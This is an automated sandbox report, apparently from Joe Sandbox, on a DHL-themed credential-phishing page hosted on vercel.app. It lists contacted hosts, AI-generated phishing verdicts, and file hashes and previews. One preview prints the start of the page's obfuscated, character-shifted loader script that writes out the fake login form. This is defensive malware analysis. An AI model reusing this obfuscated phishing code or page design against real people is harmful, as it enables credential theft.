                        https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://jd-amber.vercel.app/true
                        • Avira URL Cloud: safe
                        unknown
                        https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.glitch.me/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.icofalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://asfasfasfasp.neocities.org/dh-style.cssfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://asfasfasfasp.neocities.org/bootstrap.min.cssfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://asfasfasfasp.neocities.org/mydhl-plus.svgfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://jd-amber.vercel.app/#helco2024152@hdel.co.krtrue
                          unknown
                          https://asfasfasfasp.neocities.org/logo.pngfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.html-code-generator.comchromecache_66.7.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_73.7.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://getbootstrap.com)chromecache_73.7.dr, chromecache_61.7.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_73.7.dr, chromecache_61.7.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://opensource.org/licenses/MIT).chromecache_72.7.drfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          18.66.102.46
                          cdn.glitch.meUnited States
                          3MIT-GATEWAYSUSfalse
                          142.250.185.132
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          99.86.4.12
                          cdn.glitch.comUnited States
                          16509AMAZON-02USfalse
                          104.18.11.207
                          maxcdn.bootstrapcdn.comUnited States
                          13335CLOUDFLARENETUSfalse
                          198.51.233.2
                          asfasfasfasp.neocities.orgUnited States
                          395409NEOCITIESUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          151.101.66.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          76.76.21.93
                          jd-amber.vercel.appUnited States
                          16509AMAZON-02UStrue
                          104.17.25.14
                          cdnjs.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          18.66.102.85
                          unknownUnited States
                          3MIT-GATEWAYSUSfalse
                          IP
                          192.168.2.7
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1469966
                          Start date and time:2024-07-09 11:32:15 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 30s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:https://jd-amber.vercel.app/#helco2024152@hdel.co.kr
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal76.phis.win@17/29@20/11
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Browse: https://jd-amber.vercel.app/#email
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 74.125.206.84, 142.250.186.46, 142.250.181.227, 34.104.35.123, 172.217.18.10, 142.250.74.202, 142.250.186.67, 142.250.186.170, 142.250.185.106, 142.250.186.138, 216.58.206.42, 142.250.186.74, 142.250.185.202, 142.250.185.138, 142.250.181.234, 172.217.18.106, 142.250.185.170, 172.217.23.106, 142.250.186.42, 142.250.184.202, 172.217.16.138, 142.250.185.234, 2.19.244.127, 13.85.23.86, 93.184.221.240, 20.166.126.56, 40.127.169.103, 142.250.185.195, 20.114.59.183
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, clients2.google.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          No simulations
                          InputOutput
                          URL: https://jd-amber.vercel.app/#helco2024152@hdel.co.kr Model: Perplexity: mixtral-8x7b-instruct
                          {"loginform": true,"urgency": true,"captcha": false,"reasons": ["The webpage contains a login form that requests sensitive information such as email addresses and passwords.","The text creates a sense of urgency by using phrases like 'Downloading Shipment Document' and 'accessing sensitive info'."]}
                          Title: DHL | Tracking System OCR: Download Shipment Docume t Beca use you're accessing sensitive info, you need to verify your password.. tog in Withy cre helc02024152@hdel.co.kr tracking Enter Email Password MvDHt Download Now 
                          URL: https://jd-amber.vercel.app/#email Model: Perplexity: mixtral-8x7b-instruct
                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no text creating a sense of urgency.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                          Title: DHL | Tracking System OCR: Download Shipment Docume t Beca use you're accessing sensitive info, you need to verify your password.. L:FL'0gi -withy cre email tracking Enter Email Password MvDHt Download Now 
                          URL: https://jd-amber.vercel.app Model: gpt-4o
                          ```json{  "phishing_score": 9,  "brands": "DHL",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "dhl.com",  "reasons": "The URL 'https://jd-amber.vercel.app' does not match the legitimate domain 'dhl.com' associated with DHL. The site prominently displays a login form requesting email credentials, which is a common phishing tactic. The text 'Login with your gmail credentials to view tracking information' is highly suspicious as legitimate DHL services would not ask for Gmail credentials. Additionally, the domain 'vercel.app' is not associated with DHL, and the email domain 'hdel.co.kr' is also suspicious. The combination of these factors strongly indicates that this is a phishing site."}
                          URL: https://jd-amber.vercel.app Model: gpt-4o
                          ```json{  "phishing_score": 9,  "brands": "DHL",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "dhl.com",  "reasons": "The URL 'https://jd-amber.vercel.app' does not match the legitimate domain 'dhl.com' associated with DHL. The page prominently displays a login form requesting email and password, which is a common phishing technique. The message 'Login with your Gmail credentials to view tracking information' is another red flag, as it is unusual for DHL to request Gmail credentials. The domain 'vercel.app' is not associated with DHL, making it highly suspicious. The combination of these factors strongly indicates that this is a phishing site."}
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows icon resource - 3 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                          Category:dropped
                          Size (bytes):2734
                          Entropy (8bit):2.691298516048275
                          Encrypted:false
                          SSDEEP:12:Ag4l3/iDCnqLqBPf/Z5WD7DWwfgvDMM5c2F+M:Ajl3/ibLe/fWD7DWigXzF+
                          MD5:1DB617FC614C1DF23A9C90548582B8C4
                          SHA1:4A4C66238FB5235FD14C37DBA698E4BC406DDDF5
                          SHA-256:C0C78F3F6D1032AFF5BE66BDEDECBDF38E3E3453BF98C16013D44336E955D72F
                          SHA-512:26591058B1AE7B30FE806A05C62FA6F461686D5D29A37F0DFE13430BF877E33375ACA81DACD5883AA4436973D8F494CFBE7CA1EF437540230AB32A91E70E58F9
                          Malicious:false
                          Reputation:low
                          Preview:......00......h...6... ......................(.......(...0...`........................................!...5...........................H...a..................UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUT..D.....I.EI.ET....H..EW...!......4..$.....{..uW......"*K"+["+C""""w..uPfff...k..z....t..vf`ffeUUUU..:g.....!.)..6UUUUUUUUP.333..g.....J...UUUUUUUU.....+U......!.uUUUUUUUUX....@U......I..UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65325)
                          Category:downloaded
                          Size (bytes):144877
                          Entropy (8bit):5.049937202697915
                          Encrypted:false
                          SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
                          MD5:450FC463B8B1A349DF717056FBB3E078
                          SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                          SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                          SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                          Malicious:false
                          Reputation:low
                          URL:https://asfasfasfasp.neocities.org/bootstrap.min.css
                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (32012)
                          Category:downloaded
                          Size (bytes):69597
                          Entropy (8bit):5.369216080582935
                          Encrypted:false
                          SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                          Malicious:false
                          Reputation:low
                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 34852, version 1.0
                          Category:downloaded
                          Size (bytes):34852
                          Entropy (8bit):7.99370036872867
                          Encrypted:true
                          SSDEEP:768:zF+n1CXK5zIgArjvw2FiGzwrRnMiVPxhA31bgD8BgYyjAtJ:kAda5rRnMiVjAuDtYbtJ
                          MD5:0E8EEFB4549A2EDF26C560CB9845952E
                          SHA1:8D0B1718AACAD934FD0043C87CBC54AA091396BF
                          SHA-256:7F653B3CE9D3277457FC6DA4EDB246AE2F6C913F088C42DCB8CD2E96267AA21A
                          SHA-512:237659DD4B8680AB4856D38290D57AE9211B479C51033D8DB4AC61326551E33CC245EBF10EED35AAB6854D8196D6651EB70CB63A2BA1D7373404851FE084772E
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2
                          Preview:wOF2.......$......<................................r..2.`..V........#...........,...(.6.$..T. ..v..X..q[.+...n..!..m.ad..%.`.b...$...q..`..@.m~......IE.L:H...........A9.(u@F.(.E>..TZ.>..<L.],....&!...(x.R.Q:....yx..+r~.....r,..R.....\y..|:.\..*.9.$r...|..j].....-.0_..9=...B...}.U.`..2.L.........O..n.I];....P.7....GO..k..*.w.]$Q..M..t..!(..>p8...a...&....@............p.*......LIC.....X....*J............t.w.l....J..k...D.}o...............Y..D.....m....".6"r..Y.f`......V..E.U$...g}../.....I(.>u.....U.`n....`.............F.(0Q....BQ.9...#.Q...|...kZy.5ee..2....{Z.....+5w..1..bG".$......;..sE.=g(i...kB...Jj....VUWWu5T.t.4..fF.Z&.,....l.9a...Zr..V.V...4,........./.t?.B.2I ...t .J.......\.v.*vn.r.f@T.:Qtdp.........@l.x....)......A9Ra%..5`.s(..|.C..S'R.W...t(..u.....S.....DG~.h..`.7hG...z..pf.Kk..F....k.N%..S....2.8jN..V.H;.v.B.....2...j6$.6......Gt..> ;cgh.> ./_.....*.K..hC.@.:J..._]*.v....s3,m.....K.b...zZ..1w............([.=.5...l......
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:dropped
                          Size (bytes):1452
                          Entropy (8bit):5.354619223329768
                          Encrypted:false
                          SSDEEP:24:2dIGAs4Lf3EcePEGD6/MvvG89nglUuaexJF7IBUGLS:c5As4f3Ec4EGDJDngloexJ+BTLS
                          MD5:9FCEB942F1D6D07A87159C7644156145
                          SHA1:C1D2032B1E79C040A6BF7585E679D6E934EBD6BF
                          SHA-256:B6EFABDF54D681E8EDFB7E930A603576BC4318FA4A813B3EDF1170157D06F3FE
                          SHA-512:C4B995BDAEC01EA9159C6CAF33E4D7F3354DC3D98BA87720BA0ABFF6F834EAD4946F6EC8063196644A52B8C0B93CDFB172451938EBB34269FA0CAC3E0EAC72B2
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 24.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="MyDHL_" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 196 101.4" style="enable-background:new 0 0 196 101.4;" xml:space="preserve">.<style type="text/css">...st0{fill:#D40511;}...st1{fill:#FFCC00;}...st2{fill:#FFFFFF;}.</style>.<title>Artboard 12000</title>.<g>..<g>...<polygon class="st0" points="196,76 83.7,76 58.3,101.4 58.3,76 0,76 0,0 196,0 .."/>...<polygon class="st1" points="175.4,17.8 178.6,17.8 178.6,24.2 185,24.2 185,27.4 178.6,27.4 178.6,33.8 175.4,33.8 175.4,27.4 ....169,27.4 169,24.2 175.4,24.2 .."/>..</g>..<g>...<g>....<path class="st2" d="M15.7,54.2V17.7H28l7,21.4h1.1l7-21.4h11.8v36.5H47V28.2h-1l-7,21.4h-7.4l-7-21.4h-1v26.1H15.7z"/>....<path class="st2" d="M67.4,64.7l3.4-10.5H68L59.5,26h8.7l5.1,21.4h0.9L79.8,26h8.5L75.7,64.7H67.4z"/>...</g>...<g>....<path
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:downloaded
                          Size (bytes):1452
                          Entropy (8bit):5.354619223329768
                          Encrypted:false
                          SSDEEP:24:2dIGAs4Lf3EcePEGD6/MvvG89nglUuaexJF7IBUGLS:c5As4f3Ec4EGDJDngloexJ+BTLS
                          MD5:9FCEB942F1D6D07A87159C7644156145
                          SHA1:C1D2032B1E79C040A6BF7585E679D6E934EBD6BF
                          SHA-256:B6EFABDF54D681E8EDFB7E930A603576BC4318FA4A813B3EDF1170157D06F3FE
                          SHA-512:C4B995BDAEC01EA9159C6CAF33E4D7F3354DC3D98BA87720BA0ABFF6F834EAD4946F6EC8063196644A52B8C0B93CDFB172451938EBB34269FA0CAC3E0EAC72B2
                          Malicious:false
                          Reputation:low
                          URL:https://asfasfasfasp.neocities.org/mydhl-plus.svg
                          Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 24.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="MyDHL_" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 196 101.4" style="enable-background:new 0 0 196 101.4;" xml:space="preserve">.<style type="text/css">...st0{fill:#D40511;}...st1{fill:#FFCC00;}...st2{fill:#FFFFFF;}.</style>.<title>Artboard 12000</title>.<g>..<g>...<polygon class="st0" points="196,76 83.7,76 58.3,101.4 58.3,76 0,76 0,0 196,0 .."/>...<polygon class="st1" points="175.4,17.8 178.6,17.8 178.6,24.2 185,24.2 185,27.4 178.6,27.4 178.6,33.8 175.4,33.8 175.4,27.4 ....169,27.4 169,24.2 175.4,24.2 .."/>..</g>..<g>...<g>....<path class="st2" d="M15.7,54.2V17.7H28l7,21.4h1.1l7-21.4h11.8v36.5H47V28.2h-1l-7,21.4h-7.4l-7-21.4h-1v26.1H15.7z"/>....<path class="st2" d="M67.4,64.7l3.4-10.5H68L59.5,26h8.7l5.1,21.4h0.9L79.8,26h8.5L75.7,64.7H67.4z"/>...</g>...<g>....<path
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:data
                          Category:downloaded
                          Size (bytes):108547
                          Entropy (8bit):3.704582371477758
                          Encrypted:false
                          SSDEEP:768:NosFasAjaOr/YaYNhcnDa5aIa5aoBO0z83chtS4AGja5aluWsHZ8Nznt6nnaja5f:NoOb5b
                          MD5:24C5E3908AB5A78F2209CC7DA1A0608A
                          SHA1:31985B3F5809AEE77612B6C4990D79DA6CBDF4E9
                          SHA-256:F39800721AFFE2A2C49044DAB967C07EE3F92A3783C911CA42870A413E2C889F
                          SHA-512:A8503F86834D758D99157BA5807C90B2F84D39FE976D1C38D80DF14F21C0FA771CEED68C6700E9D1607296DC0298EB28CB5AA7F9087F8182FCA8AD5B92C67EF7
                          Malicious:false
                          Reputation:low
                          URL:https://jd-amber.vercel.app/
                          Preview:<script>var s="=tdsjqu?..=\"..!dpef!cz!iuuqt;00xxx/iunm.dpef.hfofsbups/dpn!..?..epdvnfou/xsjuf)voftdbqf)(&4Diunm&31mboh&4E&33fo&33&4F&4Difbe&4F&1B&1B&4Difbe&4F&1B&31&31&31&31&4Dnfub&31dibstfu&4E&33vug.9&33&4F&1B&31&31&31&31&4Dnfub&31obnf&4E&33wjfxqpsu&33&31dpoufou&4E&33xjeui&4Eefwjdf.xjeui&3D&31jojujbm.tdbmf&4E2&3D&31tisjol.up.gju&4Eop&33&4F&1B&31&31&31&31&4Dujumf&4F&31EIM&31&8D&31Usbdljoh&31Tztufn&4D0ujumf&4F&1B&1:&4Dmjol&31isfg&4E&33iuuqt&4B00gpout/hpphmfbqjt/dpn0dtt&4Ggbnjmz&4EVcvouv&37ejtqmbz&4Etxbq&33&31sfm&4E&33tuzmftiffu&33&4F&1B&31&31&31&31&4Dmjol&31sfm&4E&33tipsudvu&31jdpo&33&31isfg&4E&33iuuqt&4B00deo/hmjudi/dpn0f43g6g22.78b:.5952.c33e.cd2ec6cb696b&363Ggbwjdpo`eim/jdp&33&31uzqf&4E&33jnbhf0hjg&33&4F&1B&31&31&31&31&4Dmjol&31sfm&4E&33tuzmftiffu&33&31isfg&4E&33iuuqt&4B00btgbtgbtgbtq/ofpdjujft/psh0cpputusbq/njo/dtt&33&4F&1B&1:&4Dmjol&31sfm&4E&33tuzmftiffu&33&31isfg&4E&33iuuqt&4B00btgbtgbtgbtq/ofpdjujft/psh0ei.tuzmf/dtt&33&4F&1B&4D0ifbe&4F&1B&4Dcpez&4F&1B&4Dcpez&31podpoufyunfov&4E&3
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 600 x 150, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):45618
                          Entropy (8bit):7.927429330114178
                          Encrypted:false
                          SSDEEP:768:K2msNXWaVNdicNxBdZ8/D2LBW7wW8y9WvHOJX3nnD6LmL23GJhvn1mKZ:KTkNRxLO/DcBW5WvHMH2JG7vn5Z
                          MD5:F3A7218A132D0B4BE51F00D98110633D
                          SHA1:A9FF8840452B84661509A9E60669673A09A05C1D
                          SHA-256:9DFC1FD58D4F9042DDABB75D87BD8DCAD6E121DB13A143B7B0935B1EBE83D35E
                          SHA-512:BA75272C61AB0C9178123506714A8EE6091DAAFD1DC7E721F419C4F2E3B752D1E2958494EE58FE455A38D3E378CD304692ED80408A9C5B7EFB3809768142C064
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR...X............1....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....prVWx..[.. ....2.&...]dO...d3]@..t...L2G...D:R.....ccl._.~.V?...Y.l.-T..A...T.M.+.PY.e}P}.3.yU.U........_.w.....=N...~.......)..[LS.j....q.....}1.?4...\L4..b{.g.[t..w...,... .l..Z...<L+h.0..w.:...|q..l.(..xkm(;C..Yk.]..;4R8.!.o.(..z../.....b.#.Q.C...D.~.;q.uC....].}.J./.(..Q...........:d...8.M.<gX..&.."'.J.T~'yC2....4.S;J.......`.'?.x[.#u.].T.a=.)m.s..~.K......+...F9...N.........N..........(O....?......D>'....).#.<......=...V.O.M.......^.%Z..5t.....L...)$N...p?...2s....K.v...................................|.oy.V.q.o....HmkBF........................................................................).3....wmkTSx..]Ys...d...-..<.....).X.<..().$^...@..ycK...\...}.9......H...$.@w...w..N^....d....?.L.....Qmv......5;.:n{......T..Y....u}..'pA.....Y....z.k.op3U.)C.U.(-.Qn....OO.......Gp.Z.).J.J/...>..C.N..{64l.....9k..L.c8.ig..."...h.G...
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (64464)
                          Category:downloaded
                          Size (bytes):320200
                          Entropy (8bit):6.013667560091497
                          Encrypted:false
                          SSDEEP:6144:C9NidAT9VXWybtFlfYjk1Yagm9q1IdELWandX7gD9NidAT9VXWybtFz:C9Nl9tbtFV2laz9kI+LWYh7gD9Nl9tbL
                          MD5:ADF5C403AD51E826BC67FA9A30145BA7
                          SHA1:20F728C81ACE69610CB8FB9D5425190A63C2EAD9
                          SHA-256:FD8AC285E5E34911421C5400CB7D8E7D909CFC121F19512CA051F37616629211
                          SHA-512:BA4AEA3FC7FC04340B60EB1982F58C2312B2F58EE72E3B6C11011F9CC303237F943CAB965C1A3C492EFC761A257BF79C03A057285F7B07193CA9A16D6201FFFB
                          Malicious:false
                          Reputation:low
                          URL:https://asfasfasfasp.neocities.org/dh-style.css
                          Preview:* {. margin: 0px;. padding: 0px;. list-style: none;..}.img {. max-width: 100%;.}..a {. text-decoration: none;. outline: none;. color: #444;.}..a:hover {. color: #444;.}..ul {. margin-bottom: 0;. padding-left: 0;.}..a:hover,.a:focus,.input,.textarea {. text-decoration: none;. outline: none;.}..center{. text-align: center;.}..left{. text-align: left;.}..right{. text-align: right;.}..cp {. cursor: pointer.}.html,body{. height: 100%;.}.p {. margin-bottom: 0px;. width: 100%;.}..no-padding {. padding: 0px;.}...no-margin {. margin: 0px;..}..hid{. display: none;.}..top-mar{. margin-top: 15px;.}..h-100{. height: 100%;;.}.::placeholder {. color: #747f8a !important;. font-size: 13px;. opacity: .5 !important;.}..container-fluid{. padding: 0px;.}.h1,h2,h3,h4,h5,h6{. font-family: $font-regular;.}.strong{..font-family: 'Ubuntu', sans-serif;.}.body{. background-color:#fafafa !important;. font-family: 'Ubuntu',
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (32065)
                          Category:downloaded
                          Size (bytes):85578
                          Entropy (8bit):5.366055229017455
                          Encrypted:false
                          SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                          MD5:2F6B11A7E914718E0290410E85366FE9
                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                          Malicious:false
                          Reputation:low
                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
